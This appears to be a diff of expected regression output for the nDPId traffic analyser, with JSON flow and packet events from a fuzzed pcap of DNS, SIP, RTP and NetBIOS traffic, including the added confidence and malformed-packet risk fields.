+00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":675,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471068711,"flow_last_seen":1120471068711,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120471068711,"l3_proto":"ip4","src_ip":"62.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
 00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":676,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470891857,"flow_last_seen":1120470891857,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120471077370,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":19192,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00655{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":676,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120470899859,"flow_last_seen":1120470899861,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1120471077370,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2809,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
-00624{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":676,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":211,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470899862,"flow_last_seen":1120470899862,"flow_idle_time":180000,"flow_min_l4_payload_len":1076,"flow_max_l4_payload_len":1076,"flow_tot_l4_payload_len":1076,"flow_avg_l4_payload_len":1076,"midstream":0,"ts_msec":1120471077370,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.35","src_port":5060,"dst_port":17860,"l4_proto":"udp","ndpi": {"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
+00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":676,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120470899859,"flow_last_seen":1120470899861,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1120471077370,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2809,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00660{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":676,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":211,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470899862,"flow_last_seen":1120470899862,"flow_idle_time":180000,"flow_min_l4_payload_len":1076,"flow_max_l4_payload_len":1076,"flow_tot_l4_payload_len":1076,"flow_avg_l4_payload_len":1076,"midstream":0,"ts_msec":1120471077370,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.35","src_port":5060,"dst_port":17860,"l4_proto":"udp","ndpi": {"confidence": {"1":"Match by port"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
 00597{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":676,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":211,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470899862,"flow_last_seen":1120470899862,"flow_idle_time":180000,"flow_min_l4_payload_len":1076,"flow_max_l4_payload_len":1076,"flow_tot_l4_payload_len":1076,"flow_avg_l4_payload_len":1076,"midstream":0,"ts_msec":1120471077370,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.35","src_port":5060,"dst_port":17860,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":676,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":212,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470899865,"flow_last_seen":1120470899865,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120471077370,"l3_proto":"ip4","src_ip":"192.170.1.2","dst_ip":"192.168.1.1","src_port":2810,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00663{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":676,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1120470796941,"flow_last_seen":1120471065350,"flow_idle_time":180000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":1065,"flow_tot_l4_payload_len":10420,"flow_avg_l4_payload_len":473,"midstream":0,"ts_msec":1120471077370,"l3_proto":"ip4","src_ip":"212.242.33.35","dst_ip":"192.168.1.2","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
-00662{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":676,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470984353,"flow_last_seen":1120470984353,"flow_idle_time":180000,"flow_min_l4_payload_len":324,"flow_max_l4_payload_len":324,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":324,"midstream":0,"ts_msec":1120471077370,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.201","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
-00695{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":676,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470983860,"flow_last_seen":1120470983860,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120471077370,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2815,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17":"Malformed packet"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00689{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":676,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1120470796941,"flow_last_seen":1120471065350,"flow_idle_time":180000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":1065,"flow_tot_l4_payload_len":10420,"flow_avg_l4_payload_len":473,"midstream":0,"ts_msec":1120471077370,"l3_proto":"ip4","src_ip":"212.242.33.35","dst_ip":"192.168.1.2","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
+00688{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":676,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470984353,"flow_last_seen":1120470984353,"flow_idle_time":180000,"flow_min_l4_payload_len":324,"flow_max_l4_payload_len":324,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":324,"midstream":0,"ts_msec":1120471077370,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.201","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
+00802{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":676,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470983860,"flow_last_seen":1120470983860,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120471077370,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2815,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
 00587{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":676,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120470983999,"flow_last_seen":1120470993243,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120471077370,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2816,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00663{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":676,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470985511,"flow_last_seen":1120470985511,"flow_idle_time":180000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":0,"ts_msec":1120471077370,"l3_proto":"ip4","src_ip":"81.168.1.2","dst_ip":"212.242.33.36","src_port":30000,"dst_port":40392,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"RTP","breed":"Acceptable","category":"Media"}}
-00664{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":676,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":225,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470985348,"flow_last_seen":1120470985348,"flow_idle_time":180000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":0,"ts_msec":1120471077370,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"212.242.33.36","src_port":30000,"dst_port":40392,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"RTP","breed":"Acceptable","category":"Media"}}
-00664{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":676,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1120470985421,"flow_last_seen":1120470985466,"flow_idle_time":180000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":860,"flow_avg_l4_payload_len":172,"midstream":0,"ts_msec":1120471077370,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.36","src_port":30000,"dst_port":40392,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"RTP","breed":"Acceptable","category":"Media"}}
-00664{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":676,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470985504,"flow_last_seen":1120470985504,"flow_idle_time":180000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":0,"ts_msec":1120471077370,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"214.242.33.36","src_port":30000,"dst_port":40392,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"RTP","breed":"Acceptable","category":"Media"}}
-00662{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":676,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470985418,"flow_last_seen":1120470985418,"flow_idle_time":180000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":0,"ts_msec":1120471077370,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"37.115.0.36","src_port":30000,"dst_port":40392,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"RTP","breed":"Acceptable","category":"Media"}}
+00689{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":676,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470985511,"flow_last_seen":1120470985511,"flow_idle_time":180000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":0,"ts_msec":1120471077370,"l3_proto":"ip4","src_ip":"81.168.1.2","dst_ip":"212.242.33.36","src_port":30000,"dst_port":40392,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}}
+00690{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":676,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":225,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470985348,"flow_last_seen":1120470985348,"flow_idle_time":180000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":0,"ts_msec":1120471077370,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"212.242.33.36","src_port":30000,"dst_port":40392,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}}
+00690{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":676,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1120470985421,"flow_last_seen":1120470985466,"flow_idle_time":180000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":860,"flow_avg_l4_payload_len":172,"midstream":0,"ts_msec":1120471077370,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.36","src_port":30000,"dst_port":40392,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}}
+00690{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":676,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470985504,"flow_last_seen":1120470985504,"flow_idle_time":180000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":0,"ts_msec":1120471077370,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"214.242.33.36","src_port":30000,"dst_port":40392,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}}
+00688{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":676,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470985418,"flow_last_seen":1120470985418,"flow_idle_time":180000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":0,"ts_msec":1120471077370,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"37.115.0.36","src_port":30000,"dst_port":40392,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"RTP","breed":"Acceptable","category":"Media"}}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":676,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471077370,"flow_last_seen":1120471077370,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120471077370,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2829,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":676,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":244,"flow_packet_id":1,"flow_last_seen":1120471077370,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120471077370,"pkt":"ADBUADRWAODtAW69CABFAABIbGAAAIARSvHAqAECwKgBAQsNADUANFmE0DMBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
-00758{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":676,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471077370,"flow_last_seen":1120471077370,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120471077370,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2829,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":676,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471077370,"flow_last_seen":1120471077370,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120471077370,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2829,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":677,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":244,"flow_packet_id":2,"flow_last_seen":1120471078365,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120471078365,"pkt":"ADBUADRWAODtAW69CABFAABIbGEAAIARSvDAqAECwKgBAQsNADUANFmE0DMBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
 00407{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":678,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"ts_msec":1120471080368,"pkt":"ADBUADRWAODtAW69CABFAABjbGIAAIARSu\/AqAECwKgBAQsNADUANFmE0DMBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3muZXJjaXR5AmRrAAAhAAE="}
 00199{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":678,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":52}
 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":679,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":245,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471082371,"flow_last_seen":1120471082371,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120471082371,"l3_proto":"ip4","src_ip":"192.168.54.2","dst_ip":"192.168.1.1","src_port":2829,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":679,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":245,"flow_packet_id":1,"flow_last_seen":1120471082371,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120471082371,"pkt":"ADBUADRWAODtAW69CABFAABIbGMAAIARSu7AqDYCwKgBAQsNADUANFmE0DMBAAABAAAAAAAABF9zaXAEX3VkcCVzAHAJY2liZXJjaXR5AmRrAAAhAAE="}
-00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":679,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":245,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471082371,"flow_last_seen":1120471082371,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120471082371,"l3_proto":"ip4","src_ip":"192.168.54.2","dst_ip":"192.168.1.1","src_port":2829,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17":"Malformed packet"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":28681,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00871{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":679,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":245,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471082371,"flow_last_seen":1120471082371,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120471082371,"l3_proto":"ip4","src_ip":"192.168.54.2","dst_ip":"192.168.1.1","src_port":2829,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":28681,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":680,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":246,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471084097,"flow_last_seen":1120471084097,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1120471084097,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2830,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":680,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":246,"flow_packet_id":1,"flow_last_seen":1120471084097,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"ts_msec":1120471084097,"pkt":"ADBUADQ1AODtAW69CABFAAA+bGQAAIARSvfAqAECwKgBAQsOADUAKohoTTQBAAABAAAAAAAAA3NpcAljeWJlcmNpdHkCZGsAQQEAAQ=="}
-00751{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":680,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":246,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471084097,"flow_last_seen":1120471084097,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1120471084097,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2830,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":16641,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00777{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":680,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":246,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120471084097,"flow_last_seen":1120471084097,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1120471084097,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2830,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":16641,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":681,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":246,"flow_packet_id":2,"flow_last_seen":1120471085095,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"ts_msec":1120471085095,"pkt":"JDBUADRWAODtAW69CABFAAA+bGUAAIARSvbAqAECwKgBAQsOADUAKohoTTUBAAABAAAAAAAAA3NpcAljeWJlcmNpdHkCZGsAAAEAAQ=="}
-00755{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":681,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":246,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120471084097,"flow_last_seen":1120471085095,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1120471085095,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2830,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
